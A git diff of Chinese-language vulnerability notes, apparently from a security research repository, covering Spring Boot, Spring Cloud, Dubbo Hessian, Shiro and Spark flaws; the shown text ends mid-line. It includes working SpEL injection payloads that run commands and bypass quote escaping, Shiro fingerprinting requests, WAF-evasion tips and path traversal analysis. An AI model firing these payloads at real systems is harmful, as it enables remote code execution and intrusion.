Binary files /dev/null and b/framework/microservice/skywalking/skywalking.assets/image-20220113130647264.png differ diff --git a/framework/microservice/skywalking/skywalking.assets/image-20220113144532353.png b/framework/microservice/skywalking/skywalking.assets/image-20220113144532353.png new file mode 100644 index 00000000..6cdfa639 Binary files /dev/null and b/framework/microservice/skywalking/skywalking.assets/image-20220113144532353.png differ diff --git a/framework/microservice/skywalking/skywalking.assets/image-20220113144942928.png b/framework/microservice/skywalking/skywalking.assets/image-20220113144942928.png new file mode 100644 index 00000000..5adc106c Binary files /dev/null and b/framework/microservice/skywalking/skywalking.assets/image-20220113144942928.png differ diff --git a/framework/microservice/skywalking/skywalking.assets/image-20220113145030966.png b/framework/microservice/skywalking/skywalking.assets/image-20220113145030966.png new file mode 100644 index 00000000..b9e93976 Binary files /dev/null and b/framework/microservice/skywalking/skywalking.assets/image-20220113145030966.png differ diff --git a/framework/microservice/skywalking/skywalking.assets/image-20220113155050988.png b/framework/microservice/skywalking/skywalking.assets/image-20220113155050988.png new file mode 100644 index 00000000..fc9517a1 Binary files /dev/null and b/framework/microservice/skywalking/skywalking.assets/image-20220113155050988.png differ diff --git a/framework/microservice/skywalking/skywalking.assets/image-20220114133448365.png b/framework/microservice/skywalking/skywalking.assets/image-20220114133448365.png new file mode 100644 index 00000000..11d1b087 Binary files /dev/null and b/framework/microservice/skywalking/skywalking.assets/image-20220114133448365.png differ diff --git a/framework/microservice/skywalking/skywalking.assets/image-20220114140427507.png b/framework/microservice/skywalking/skywalking.assets/image-20220114140427507.png new file mode 100644 index 00000000..55d8146d Binary files /dev/null and b/framework/microservice/skywalking/skywalking.assets/image-20220114140427507.png differ diff --git a/framework/microservice/skywalking/skywalking.assets/image-20220114144223966.png b/framework/microservice/skywalking/skywalking.assets/image-20220114144223966.png new file mode 100644 index 00000000..715fe2f5 Binary files /dev/null and b/framework/microservice/skywalking/skywalking.assets/image-20220114144223966.png differ diff --git a/framework/microservice/skywalking/skywalking.assets/image-20220114152004486.png b/framework/microservice/skywalking/skywalking.assets/image-20220114152004486.png new file mode 100644 index 00000000..28b57b33 Binary files /dev/null and b/framework/microservice/skywalking/skywalking.assets/image-20220114152004486.png differ diff --git a/framework/microservice/spark/README.md b/framework/microservice/spark/README.md new file mode 100644 index 00000000..39f2f092 --- /dev/null +++ b/framework/microservice/spark/README.md @@ -0,0 +1,17 @@ +前置基础 +--- + + +相关漏洞 +--- + +### Spark Shell命令注入漏洞 +> 占坑 + +- [详见](https://t.zsxq.com/IQRZrRZ) + + +在 org.apache.hadoop.fs.FileUtill 类的 unTar 方法里,用的 bash shell 命令拼接,所以可以使用命令加载恶意文件名的 tar 文件达到rce的效果。 + +![image](https://user-images.githubusercontent.com/55024146/160282134-cf0ea581-9bd5-41fe-bb0a-888b90307e19.png) + diff --git a/framework/microservice/spring cloud/function/README.md b/framework/microservice/spring cloud/function/README.md new file mode 100644 index 00000000..e8ae1955 --- /dev/null +++ b/framework/microservice/spring cloud/function/README.md @@ -0,0 +1,22 @@ +前置基础 +--- +**简介** + +SpringCloudFunction是SpringBoot开发的一个Servless中间件(FAAS),支持基于SpEL的函数式动态路由。 + +相关漏洞 +--- + +### Spring Cloud Function v3.x SpEL RCE + +详细分析见 +- [Spring Cloud Function v3.x SpEL RCE](https://mp.weixin.qq.com/s/U7YJ3FttuWSOgCodVSqemg) + +**第1种利用:需要修改配置+任意路由** + +![%BHK HK{RHH0E0~1}WTWGYO](https://user-images.githubusercontent.com/55024146/160249394-794b2933-46ac-40d9-ba93-1be98207b462.png) + + +**第2种利用:默认配置+特定路由** + +![R)2817XQE4ドルO7428EPMC0II](https://user-images.githubusercontent.com/55024146/160249416-645ee796-279a-4112-9ee4-5f75f0fdf9b3.png) diff --git a/framework/microservice/spring cloud/gateway/README.md b/framework/microservice/spring cloud/gateway/README.md new file mode 100644 index 00000000..3a69a76e --- /dev/null +++ b/framework/microservice/spring cloud/gateway/README.md @@ -0,0 +1,23 @@ +相关漏洞 +--- + + +### CVE-2022-22947 SpEL Injection -> RCE + +参考 +- [Spring cloud gateway通过SPEL注入内存马](https://gv7.me/articles/2022/the-spring-cloud-gateway-inject-memshell-through-spel-expressions/) +- [表达式注入 -> RCE](https://github.com/nbxiglk0/Note/blob/master/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/Java/Spring%20Cloud%20GateWay/CVE-2022-22947/CVE-2022-22947.md) +- https://github.com/vulhub/vulhub/blob/master/spring/CVE-2022-22947/README.zh-cn.md + + +环境搭建 +``` +git clone https://github.com/spring-cloud/spring-cloud-gateway +cd spring-cloud-gateway +git checkout v3.1.0 +``` +创建供codeql使用的数据库 +``` +codeql database create ..\databases\spring-cloud-gateway-310 --language="java" --command="mvn clean install --file pom.xml -Dmaven.test.skip=true" +``` + diff --git a/framework/rpc/dubbo/CVE-2021-43297.md b/framework/rpc/dubbo/CVE-2021-43297.md new file mode 100644 index 00000000..8ddcfb69 --- /dev/null +++ b/framework/rpc/dubbo/CVE-2021-43297.md @@ -0,0 +1,196 @@ +#### 漏洞描述 + +Dubbo Hessian-Lite 3.2.11及之前版本中存在潜在RCE攻击风险。Hessian-Lite在遇到序列化异常时会输出相关信息,这可能导致触发某些恶意定制的Bean的toString方法,从而引发RCE攻击。 + +#### 漏洞复现 + +##### 环境搭建 + +https://github.com/longofo/Apache-Dubbo-Hessian2-CVE-2021-43297 + +##### 漏洞验证 + +测试效果如图: + +![image-20220118145950795](img/image-20220118145950795.png) + +#### 漏洞分析 + +**报错堆栈信息** + +![image-20220118150055029](img/image-20220118150055029.png) + +**Source** + +- com.alibaba.com.caucho.hessian.io.Hessian2Input#expect + - 隐式调用toString()方法 -> RCE + +```java + protected IOException expect(String expect, int ch) throws IOException { + if (ch < 0) { + return this.error("expected " + expect + " at end of file"); + } else { + --this._offset; + + try { + Object obj = this.readObject(); + // 隐式调用toString()方法 -> RCE + return obj != null ? this.error("expected " + expect + " at 0x" + Integer.toHexString(ch & 255) + " " + obj.getClass().getName() + " (" + obj + ")") : this.error("expected " + expect + " at 0x" + Integer.toHexString(ch & 255) + " null"); + } catch (IOException var4) { + log.log(Level.FINE, var4.toString(), var4); + return this.error("expected " + expect + " at 0x" + Integer.toHexString(ch & 255)); + } + } + } +``` + + + +**调用栈** + +```java +expect:3563, Hessian2Input (com.alibaba.com.caucho.hessian.io) +readString:1883, Hessian2Input (com.alibaba.com.caucho.hessian.io) +readUTF:90, Hessian2ObjectInput (org.apache.dubbo.common.serialize.hessian2) +decode:111, DecodeableRpcInvocation (org.apache.dubbo.rpc.protocol.dubbo) +decode:83, DecodeableRpcInvocation (org.apache.dubbo.rpc.protocol.dubbo) +decode:57, DecodeHandler (org.apache.dubbo.remoting.transport) +received:44, DecodeHandler (org.apache.dubbo.remoting.transport) +run:57, ChannelEventRunnable (org.apache.dubbo.remoting.transport.dispatcher) +runWorker:1149, ThreadPoolExecutor (java.util.concurrent) +run:624, ThreadPoolExecutor$Worker (java.util.concurrent) +run:41, InternalRunnable (org.apache.dubbo.common.threadlocal) +run:748, Thread (java.lang) +``` + + + +**简要分析** + +- com.alibaba.com.caucho.hessian.io.Hessian2Input#readString() + +```java + public String readString() throws IOException { + int tag = this.read(); + int ch; + switch(tag) { + case 0: + ... + case 31: + this._isLastChunk = true; + this._chunkLength = tag - 0; + this._sbuf.setLength(0); + + while((ch = this.parseChar())>= 0) { + this._sbuf.append((char)ch); + } + + return this._sbuf.toString(); + case 32: + ... + case 127: + default: + throw this.expect("string", tag); + case 48: + case 49: + case 50: + case 51: + this._isLastChunk = true; + this._chunkLength = (tag - 48) * 256 + this.read(); + this._sbuf.setLength(0); + + while((ch = this.parseChar())>= 0) { + this._sbuf.append((char)ch); + } + + return this._sbuf.toString(); + case 56: + case 57: + case 58: + case 59: + case 60: + case 61: + case 62: + case 63: + return String.valueOf((tag - 60 << 16) + 256 * this.read() + this.read()); + case 68: + return String.valueOf(this.parseDouble()); + case 70: + return "false"; + case 73: + case 89: + return String.valueOf(this.parseInt()); + case 76: + return String.valueOf(this.parseLong()); + case 78: + return null; + case 82: + case 83: + this._isLastChunk = tag == 83; + this._chunkLength = (this.read() << 8) + this.read(); + this._sbuf.setLength(0); + + while((ch = this.parseChar())>= 0) { + this._sbuf.append((char)ch); + } + + return this._sbuf.toString(); + case 84: + return "true"; + case 91: + return "0.0"; + case 92: + return "1.0"; + case 93: + return String.valueOf((byte)(this._offset < this._length ? this._buffer[this._offset++] : this.read())); + case 94: + return String.valueOf((short)(256 * this.read() + this.read())); + case 95: + ch = this.parseInt(); + return String.valueOf(0.001D * (double)ch); + case 128: + ... + case 191: + return String.valueOf(tag - 144); + case 192: + ... + case 207: + return String.valueOf((tag - 200 << 8) + this.read()); + case 208: + case 209: + case 210: + case 211: + case 212: + case 213: + case 214: + case 215: + return String.valueOf((tag - 212 << 16) + 256 * this.read() + this.read()); + case 216: + ... + case 239: + return String.valueOf(tag - 224); + case 240: + ... + case 255: + return String.valueOf((tag - 248 << 8) + this.read()); + } + } +``` + +共256个case,调用`this.read()`中读取tag然后进入不同的分支 + +- com.alibaba.com.caucho.hessian.io.Hessian2Input#read() + + ```java + public final int read() throws IOException { + return this._length <= this._offset && !this.readBuffer() ? -1 : this._buffer[this._offset++] & 255; + } + ``` + + + +**构造思路** + +可见这里若想调用到`this.expect()`,则需要使流程走到`default`分支,@Longofo师傅这里通过重写客户端([详见](https://paper.seebug.org/1814/#_4))实现的。 + + diff --git a/framework/rpc/dubbo/README.md b/framework/rpc/dubbo/README.md new file mode 100644 index 00000000..b4b29511 --- /dev/null +++ b/framework/rpc/dubbo/README.md @@ -0,0 +1,4 @@ +历史漏洞 + +- [x] [CVE-2021-43297 Hessian2 反序列化](CVE-2021-43297.md) +- [ ] CVE-2021-37579 Pre-Auth Unsafe Java Deserialization \ No newline at end of file diff --git a/framework/rpc/dubbo/img/7yut5.png b/framework/rpc/dubbo/img/7yut5.png new file mode 100644 index 00000000..9ebe3868 Binary files /dev/null and b/framework/rpc/dubbo/img/7yut5.png differ diff --git a/framework/rpc/dubbo/img/image-20220104011320460.png b/framework/rpc/dubbo/img/image-20220104011320460.png new file mode 100644 index 00000000..e923782e Binary files /dev/null and b/framework/rpc/dubbo/img/image-20220104011320460.png differ diff --git a/framework/rpc/dubbo/img/image-20220118145950795.png b/framework/rpc/dubbo/img/image-20220118145950795.png new file mode 100644 index 00000000..3a2f2149 Binary files /dev/null and b/framework/rpc/dubbo/img/image-20220118145950795.png differ diff --git a/framework/rpc/dubbo/img/image-20220118150055029.png b/framework/rpc/dubbo/img/image-20220118150055029.png new file mode 100644 index 00000000..0b666903 Binary files /dev/null and b/framework/rpc/dubbo/img/image-20220118150055029.png differ diff --git a/framework/rpc/dubbo/img/image-20220118162819016.png b/framework/rpc/dubbo/img/image-20220118162819016.png new file mode 100644 index 00000000..31447b80 Binary files /dev/null and b/framework/rpc/dubbo/img/image-20220118162819016.png differ diff --git a/framework/security/shiro/README.md b/framework/security/shiro/README.md new file mode 100644 index 00000000..e6258712 --- /dev/null +++ b/framework/security/shiro/README.md @@ -0,0 +1,5 @@ +历史漏洞 + +- [x] CVE-2016-4437 (Shiro550) +- [ ] CVE-2019-12422 (Shiro721) + diff --git a/framework/security/shiro/img/1d55510c8cc34de68d7a8bc524dc70bf.png b/framework/security/shiro/img/1d55510c8cc34de68d7a8bc524dc70bf.png new file mode 100644 index 00000000..3c8fa796 Binary files /dev/null and b/framework/security/shiro/img/1d55510c8cc34de68d7a8bc524dc70bf.png differ diff --git a/framework/security/shiro/img/2b21b16367074384ac407365178e92e1.png b/framework/security/shiro/img/2b21b16367074384ac407365178e92e1.png new file mode 100644 index 00000000..3e8c5859 Binary files /dev/null and b/framework/security/shiro/img/2b21b16367074384ac407365178e92e1.png differ diff --git a/framework/security/shiro/img/601125e5b570489bb7e86579bb2dea6e.png b/framework/security/shiro/img/601125e5b570489bb7e86579bb2dea6e.png new file mode 100644 index 00000000..e4549de3 Binary files /dev/null and b/framework/security/shiro/img/601125e5b570489bb7e86579bb2dea6e.png differ diff --git a/framework/security/shiro/img/662a7151089b4e999ac3aecef5628e8d.png b/framework/security/shiro/img/662a7151089b4e999ac3aecef5628e8d.png new file mode 100644 index 00000000..525703d4 Binary files /dev/null and b/framework/security/shiro/img/662a7151089b4e999ac3aecef5628e8d.png differ diff --git a/framework/security/shiro/img/image-20211022233907942.png b/framework/security/shiro/img/image-20211022233907942.png new file mode 100644 index 00000000..0b200dff Binary files /dev/null and b/framework/security/shiro/img/image-20211022233907942.png differ diff --git a/framework/security/shiro/img/image-20211118144237427.png b/framework/security/shiro/img/image-20211118144237427.png new file mode 100644 index 00000000..7317956f Binary files /dev/null and b/framework/security/shiro/img/image-20211118144237427.png differ diff --git a/framework/security/shiro/img/image-20211118144314386.png b/framework/security/shiro/img/image-20211118144314386.png new file mode 100644 index 00000000..c94ef56d Binary files /dev/null and b/framework/security/shiro/img/image-20211118144314386.png differ diff --git a/framework/security/shiro/img/image-20211118144525625.png b/framework/security/shiro/img/image-20211118144525625.png new file mode 100644 index 00000000..292d5234 Binary files /dev/null and b/framework/security/shiro/img/image-20211118144525625.png differ diff --git a/framework/security/shiro/img/image-20211118145028082.png b/framework/security/shiro/img/image-20211118145028082.png new file mode 100644 index 00000000..89ca3e0a Binary files /dev/null and b/framework/security/shiro/img/image-20211118145028082.png differ diff --git a/framework/security/shiro/img/image-20211118145106465.png b/framework/security/shiro/img/image-20211118145106465.png new file mode 100644 index 00000000..e67f6a60 Binary files /dev/null and b/framework/security/shiro/img/image-20211118145106465.png differ diff --git a/framework/security/shiro/img/image-20211118145151098.png b/framework/security/shiro/img/image-20211118145151098.png new file mode 100644 index 00000000..3218f0ae Binary files /dev/null and b/framework/security/shiro/img/image-20211118145151098.png differ diff --git a/framework/security/shiro/img/image-20211118145958901.png b/framework/security/shiro/img/image-20211118145958901.png new file mode 100644 index 00000000..045df296 Binary files /dev/null and b/framework/security/shiro/img/image-20211118145958901.png differ diff --git a/framework/security/shiro/img/image-20211118150027658.png b/framework/security/shiro/img/image-20211118150027658.png new file mode 100644 index 00000000..c7dc2132 Binary files /dev/null and b/framework/security/shiro/img/image-20211118150027658.png differ diff --git a/framework/security/shiro/img/image-20211118150058675.png b/framework/security/shiro/img/image-20211118150058675.png new file mode 100644 index 00000000..fcd615d9 Binary files /dev/null and b/framework/security/shiro/img/image-20211118150058675.png differ diff --git a/framework/security/shiro/img/image-20211118150110191.png b/framework/security/shiro/img/image-20211118150110191.png new file mode 100644 index 00000000..993b8743 Binary files /dev/null and b/framework/security/shiro/img/image-20211118150110191.png differ diff --git a/framework/security/shiro/img/image-20211118150245948.png b/framework/security/shiro/img/image-20211118150245948.png new file mode 100644 index 00000000..c16e8fca Binary files /dev/null and b/framework/security/shiro/img/image-20211118150245948.png differ diff --git a/framework/security/shiro/img/image-20211118150319178.png b/framework/security/shiro/img/image-20211118150319178.png new file mode 100644 index 00000000..ed0d4287 Binary files /dev/null and b/framework/security/shiro/img/image-20211118150319178.png differ diff --git a/framework/security/shiro/img/image-20211118153223684.png b/framework/security/shiro/img/image-20211118153223684.png new file mode 100644 index 00000000..5c90a86e Binary files /dev/null and b/framework/security/shiro/img/image-20211118153223684.png differ diff --git a/framework/security/shiro/img/image-20211118154359697.png b/framework/security/shiro/img/image-20211118154359697.png new file mode 100644 index 00000000..3bfd9c0e Binary files /dev/null and b/framework/security/shiro/img/image-20211118154359697.png differ diff --git a/framework/security/shiro/img/image-20211118154624802.png b/framework/security/shiro/img/image-20211118154624802.png new file mode 100644 index 00000000..21eb24ec Binary files /dev/null and b/framework/security/shiro/img/image-20211118154624802.png differ diff --git a/framework/security/shiro/img/image-20211118154847035.png b/framework/security/shiro/img/image-20211118154847035.png new file mode 100644 index 00000000..81c27bb7 Binary files /dev/null and b/framework/security/shiro/img/image-20211118154847035.png differ diff --git a/framework/security/shiro/img/image-20211118154924247.png b/framework/security/shiro/img/image-20211118154924247.png new file mode 100644 index 00000000..0a5e4860 Binary files /dev/null and b/framework/security/shiro/img/image-20211118154924247.png differ diff --git a/framework/security/shiro/img/image-20211118155031602.png b/framework/security/shiro/img/image-20211118155031602.png new file mode 100644 index 00000000..50655a94 Binary files /dev/null and b/framework/security/shiro/img/image-20211118155031602.png differ diff --git a/framework/security/shiro/img/image-20211118155359227.png b/framework/security/shiro/img/image-20211118155359227.png new file mode 100644 index 00000000..990b8aaf Binary files /dev/null and b/framework/security/shiro/img/image-20211118155359227.png differ diff --git a/framework/security/shiro/img/image-20211118155853780.png b/framework/security/shiro/img/image-20211118155853780.png new file mode 100644 index 00000000..ed0d4287 Binary files /dev/null and b/framework/security/shiro/img/image-20211118155853780.png differ diff --git a/framework/security/shiro/img/image-20211118160532010.png b/framework/security/shiro/img/image-20211118160532010.png new file mode 100644 index 00000000..98583999 Binary files /dev/null and b/framework/security/shiro/img/image-20211118160532010.png differ diff --git "a/framework/security/shiro/345円210円251円347円224円250円347円240円224円347円251円266円.md" "b/framework/security/shiro/345円210円251円347円224円250円347円240円224円347円251円266円.md" new file mode 100644 index 00000000..ca797856 --- /dev/null +++ "b/framework/security/shiro/345円210円251円347円224円250円347円240円224円347円251円266円.md" @@ -0,0 +1,93 @@ +指纹识别 +--- + +- Request 的 Cookie 不携带 `rememberMe=1` , 此时 Response 的 Set-Cookie 返回 1 个 `rememberMe=deleteMe` + +```http request +POST /shiroweb_war_exploded/login.jsp HTTP/1.1 +Host: localhost:9090 +Content-Type: application/x-www-form-urlencoded +Content-Length: 2 +Cookie: +``` +![](./img/601125e5b570489bb7e86579bb2dea6e.png) + + +- Request 的 Cookie 不携带 `rememberMe=1` , 此时 Response 的 Set-Cookie 返回 2 个 `rememberMe=deleteMe` + +```http request +POST /shiroweb_war_exploded/login.jsp HTTP/1.1 +Host: localhost:9090 +Content-Type: application/x-www-form-urlencoded +Content-Length: 2 +Cookie: rememberMe=1 +``` +![](./img/662a7151089b4e999ac3aecef5628e8d.png) + +漏洞利用 +--- +#### 回显 + +- [Java中间件通用回显方法的问题及处理 by fnmsd](https://blog.csdn.net/fnmsd/article/details/106890242) + +抄一遍, 然后塞到 CommonsBeanutils gadget 里 + +已测试中间件 +- tomcat v9 +- resin v4.0.66 + +测试效果: +![](./img/2b21b16367074384ac407365178e92e1.png) + +![](./img/1d55510c8cc34de68d7a8bc524dc70bf.png) + + + + + + +#### 内存马/代理 + + +#### 修改 Key + +- [通过代码执行修改Shiro密钥](http://www.yulegeyu.com/2021/11/19/%E9%80%9A%E8%BF%87%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E4%BF%AE%E6%94%B9Shiro%E5%AF%86%E9%92%A5/) + + +实战问题 +--- + +### Request header is too large + +解决方法: +- 修改 tomcat 的 maxHeaderSize +- 分离 payload, 字节码动态加载 +- 通过线程持久化存储 payload, 然后再触发 + - [浅谈Shiro550受Tomcat-Header长度限制影响突破](https://y4tacker.github.io/2022/04/14/year/2022/4/%E6%B5%85%E8%B0%88Shiro550%E5%8F%97Tomcat-Header%E9%95%BF%E5%BA%A6%E9%99%90%E5%88%B6%E5%BD%B1%E5%93%8D%E7%AA%81%E7%A0%B4/#0x02-%E6%B5%85%E8%B0%88%E6%96%B0%E6%80%9D%E8%B7%AF) + + +### SUID + +解决方法: +- 替换本地依赖包版本去生成 payload +- 修改字节码 + - [Modify ysoserial jar serialVersionUID](http://www.yulegeyu.com/2019/03/09/Modify-Ysoseriali-jar-serialVersionUID/) +- 自定义ClassLoader + - [使用自定义ClassLoader解决反序列化serialVesionUID不一致问题](https://gv7.me/articles/2020/deserialization-of-serialvesionuid-conflicts-using-a-custom-classloader/) + +### Unable to deserialze argument byte array + +无法利用 Commons-Collections 3.x 版本包含 Transform 数组的 gadget + +解决方法: +- 修改 Commons-Collections 3.x 系列 gadget 通过 TemplatesImpl 加载字节码 + - [Java反序列化利用链分析之Shiro反序列化](https://www.anquanke.com/post/id/192619) +- 使用 CommonsBeanutils 系列 gadget + - [CommonsBeanutils与无commons-collections的Shiro反序列化利用](https://www.leavesongs.com/PENETRATION/commons-beanutils-without-commons-collections.html) + +WAF 对抗 +--- + +> 相关案例 +- [01 shiro反序列化绕WAF之未知HTTP请求方法](https://gv7.me/articles/2021/shiro-deserialization-bypasses-waf-through-unknown-http-method/) +- [02 渗透遇shiro,看我巧绕waf](https://mp.weixin.qq.com/s/GKbE44VclJKj2PZ4Cpr_Sw) diff --git a/framework/security/spring security/README.md b/framework/security/spring security/README.md new file mode 100644 index 00000000..93cca469 --- /dev/null +++ b/framework/security/spring security/README.md @@ -0,0 +1,6 @@ +相关漏洞 + + +- [x] [CVE-2022-22978 Auth Bypass - RegexRequestMatcher](img/CVE-2022-22978.png) +- [x] [Authorization bypass again ?](auth-bypass%20again.md) + diff --git a/framework/security/spring security/auth-bypass again.md b/framework/security/spring security/auth-bypass again.md new file mode 100644 index 00000000..e2039661 --- /dev/null +++ b/framework/security/spring security/auth-bypass again.md @@ -0,0 +1,3 @@ +![image](https://user-images.githubusercontent.com/55024146/170682257-6e147037-32a8-4295-bacd-081d7279ca0e.png) + +![image](https://user-images.githubusercontent.com/55024146/170682278-9168dea6-1605-41f9-b5cd-d7afa07e9cec.png) diff --git a/framework/security/spring security/img/CVE-2022-22978.png b/framework/security/spring security/img/CVE-2022-22978.png new file mode 100644 index 00000000..98cb270c Binary files /dev/null and b/framework/security/spring security/img/CVE-2022-22978.png differ diff --git a/fileless-shell/jboss/README.md b/framework/web service/axis/README.md similarity index 100% rename from fileless-shell/jboss/README.md rename to framework/web service/axis/README.md diff --git a/fileless-shell/springmvc/README.md b/framework/web service/cxf/README.md similarity index 100% rename from fileless-shell/springmvc/README.md rename to framework/web service/cxf/README.md diff --git a/post-exploitation/jndi/README.md b/framework/web service/jersey/README.md similarity index 100% rename from post-exploitation/jndi/README.md rename to framework/web service/jersey/README.md diff --git a/vulnerability-analysis/tomcat/README.md b/framework/web service/wink/README.md similarity index 100% rename from vulnerability-analysis/tomcat/README.md rename to framework/web service/wink/README.md diff --git a/framework/web service/xfire/README.md b/framework/web service/xfire/README.md new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/framework/web service/xfire/README.md @@ -0,0 +1 @@ + diff --git a/framework/web/dwr/README.md b/framework/web/dwr/README.md new file mode 100644 index 00000000..36230f67 --- /dev/null +++ b/framework/web/dwr/README.md @@ -0,0 +1,6 @@ + +debug默认路径: +``` +dwr/index.html +``` +![image](https://user-images.githubusercontent.com/55024146/163032780-49b9427b-121d-4763-839a-2e3d8c0e6759.png) diff --git a/framework/web/ruoyi/README.md b/framework/web/ruoyi/README.md new file mode 100644 index 00000000..1dd20346 --- /dev/null +++ b/framework/web/ruoyi/README.md @@ -0,0 +1,7 @@ +相关漏洞 +--- + + - [01 某依rce黑名单多种bypass方法分析](https://xz.aliyun.com/t/10957) + - [02 某依后台RCE分析](https://xz.aliyun.com/t/10687) + - [03 RuoYi 可用内存马](https://xz.aliyun.com/t/10651) + - [04 若依管理后台的一些代码执行漏洞](https://xz.aliyun.com/t/10637) diff --git a/framework/web/spring boot/README.md b/framework/web/spring boot/README.md new file mode 100644 index 00000000..1baa9635 --- /dev/null +++ b/framework/web/spring boot/README.md @@ -0,0 +1,5 @@ +> attack vectors + +- https://github.com/pyn3rd/Spring-Boot-Vulnerability +- https://github.com/LandGrey/SpringBootVulExploit + diff --git a/framework/web/spring boot/SpringBoot 1.x Whitelabel Error Page SpEL RCE.md b/framework/web/spring boot/SpringBoot 1.x Whitelabel Error Page SpEL RCE.md new file mode 100644 index 00000000..d1ede191 --- /dev/null +++ b/framework/web/spring boot/SpringBoot 1.x Whitelabel Error Page SpEL RCE.md @@ -0,0 +1,84 @@ + +#### 漏洞复现 + +payload-算术表达式 +``` +id=${1011+1011} +``` +![image](https://user-images.githubusercontent.com/55024146/158839423-9045a29c-e31d-46e7-83ef-136caab0dc4a.png) + +可见表达式被成功解析 + +payload-计算器 +``` +id=${T(java.lang.Runtime).getRuntime().exec("calc")} +``` +失败,抛出异常如下 + +![image](https://user-images.githubusercontent.com/55024146/158841307-e68e7c5c-2ee7-4ca0-834d-10de59a227e6.png) + + +debug、看源码发现,在进行SpEL解析前,有以下处理 +``` +convertToReference:133, HtmlCharacterEntityReferences (org.springframework.web.util) +htmlEscape:90, HtmlUtils (org.springframework.web.util) +htmlEscape:63, HtmlUtils (org.springframework.web.util) +resolvePlaceholder:218, ErrorMvcAutoConfiguration$SpelPlaceholderResolver (org.springframework.boot.autoconfigure.web) +parseStringValue:147, PropertyPlaceholderHelper (org.springframework.util) +replacePlaceholders:126, PropertyPlaceholderHelper (org.springframework.util) +render:194, ErrorMvcAutoConfiguration$SpelView (org.springframework.boot.autoconfigure.web) +render:1244, DispatcherServlet (org.springframework.web.servlet) +processDispatchResult:1027, DispatcherServlet (org.springframework.web.servlet) +doDispatch:971, DispatcherServlet (org.springframework.web.servlet) +doService:893, DispatcherServlet (org.springframework.web.servlet) +processRequest:970, FrameworkServlet (org.springframework.web.servlet) +doPost:872, FrameworkServlet (org.springframework.web.servlet) +service:648, HttpServlet (javax.servlet.http) +service:846, FrameworkServlet (org.springframework.web.servlet) +service:729, HttpServlet (javax.servlet.http) +... +``` + +![image](https://user-images.githubusercontent.com/55024146/158843615-71270054-7003-4c7e-8b1d-ad041bdfd0af.png) + +对单引号、双引号、尖括号、&进行了HTML实体编码 + +![image](https://user-images.githubusercontent.com/55024146/158844001-1031b338-e458-4017-b7a4-44d9017600aa.png) + +如图,此时传入的payload中双引号已被编码,则不再符合SpEL表达式的语法,自然也就没法成功利用。 + +![image](https://user-images.githubusercontent.com/55024146/158845997-16e846c5-906f-4c00-9112-92ba85abe6b4.png) + +绕过:不出现单双引号 +> 利用String类的特性:将byte型数组转为字符串串对象 + +![image](https://user-images.githubusercontent.com/55024146/158849319-16a3c8ec-6f79-4f85-bca5-15e5b1463258.png) + +``` +id=${T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{99,97,108,99}))} +``` +![image](https://user-images.githubusercontent.com/55024146/158850107-fabff113-b042-4e4b-8efd-eb668cd844f3.png) + +测试效果 + +![image](https://user-images.githubusercontent.com/55024146/158850307-2077f252-0e4f-4972-b158-ce1821db3c1f.png) + +#### 漏洞利用 + +##### 回显 +``` +(new Scanner(Runtime.getRuntime().exec(cmd).getInputStream())).useDelimiter("\\A").next() +``` + +``` +id=${new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String(new byte[]{119,104,111,97,109,105})).getInputStream()))} +``` +![image](https://user-images.githubusercontent.com/55024146/158853617-24cd3b1c-3f40-474b-9389-befca11d242c.png) + +##### 内存马 + +> 待完成 + + + + diff --git "a/framework/web/spring boot/SpringBoot MultipartFile.getOriginalFilename() 345円267円256円345円274円202円346円242円263円347円220円206円.md" "b/framework/web/spring boot/SpringBoot MultipartFile.getOriginalFilename() 345円267円256円345円274円202円346円242円263円347円220円206円.md" new file mode 100644 index 00000000..ec3e2c7e --- /dev/null +++ "b/framework/web/spring boot/SpringBoot MultipartFile.getOriginalFilename() 345円267円256円345円274円202円346円242円263円347円220円206円.md" @@ -0,0 +1,95 @@ +##### v2.7.2 + +###### 缺省设置 - StandardMultipartFile - 可路径穿越 + +- spring-autoconfigure-metadata.properties + +![](img/Pasted%20image%2020220818202936.png) +- org.springframework.web.servlet.DispatcherServlet#checkMultipart + +![](img/Pasted%20image%2020220818202952.png) + +- org.springframework.web.multipart.support.StandardMultipartHttpServletRequest.StandardMultipartFile#getOriginalFilename + +```java +public String getOriginalFilename() { + return this.filename; +} +``` + +没有对文件名进行处理,可以使用 `../` 进行路径穿越 + +![](img/Pasted%20image%2020220818203007.png) + +![](img/Pasted%20image%2020220818203017.png) + +###### 自定义设置 - CommonsMultipartResolver - 不可路径穿越 + +需要引入 `commons-fileupload` 依赖 + +```xml + + commons-fileupload + commons-fileupload + 1.4 + +``` + +- org.springframework.web.multipart.commons.CommonsMultipartFile#getOriginalFilename + +```java +public String getOriginalFilename() { + String filename = this.fileItem.getName(); + if (filename == null) { + return ""; + } else if (this.preserveFilename) { + return filename; + } else { + // 出现 Linux 下分隔符的最后一个位置 `\` + int unixSep = filename.lastIndexOf(47); + // 出现 Windows 下分隔符的最后一个位置 `/` + int winSep = filename.lastIndexOf(92); + // 比较 Lin 分隔符 和 Win 分隔符的位置,选择最靠后的位置 + int pos = Math.max(winSep, unixSep); + // 截取最靠后的分隔符的位置进行截取 + // ../../\\/./filename -> filename + return pos != -1 ? filename.substring(pos + 1) : filename; + } +} +``` + +![](img/Pasted%20image%2020220818183404.png) + +##### <= v1.2.7.RELEASE + +###### 自定义设置 - CommonsMultipartResolver - 可路径穿越 + +> 内嵌 spring-web-4.1.8,而 Windows 下的路径穿越问题在 4.1.9 才修复。 + +- org.springframework.web.multipart.commons.CommonsMultipartFile#getOriginalFilename + +```java +public String getOriginalFilename() { + String filename = this.fileItem.getName(); + if (filename == null) { + return ""; + } else { + int pos = filename.lastIndexOf("/"); + /** + * filename = ../..\\flag.txt + * pos == 2 != -1 + * filename = filename.substring(pos + 1) = + * */ + + if (pos == -1) { + pos = filename.lastIndexOf("\\"); + } + + return pos != -1 ? filename.substring(pos + 1) : filename; + } +} +``` + +已在 v4.0.9 修复 + +![](img/Pasted%20image%2020220818203038.png) diff --git a/framework/web/spring boot/img/Pasted image 20220818202936.png b/framework/web/spring boot/img/Pasted image 20220818202936.png new file mode 100644 index 00000000..d8301927 Binary files /dev/null and b/framework/web/spring boot/img/Pasted image 20220818202936.png differ diff --git a/framework/web/spring boot/img/Pasted image 20220818202952.png b/framework/web/spring boot/img/Pasted image 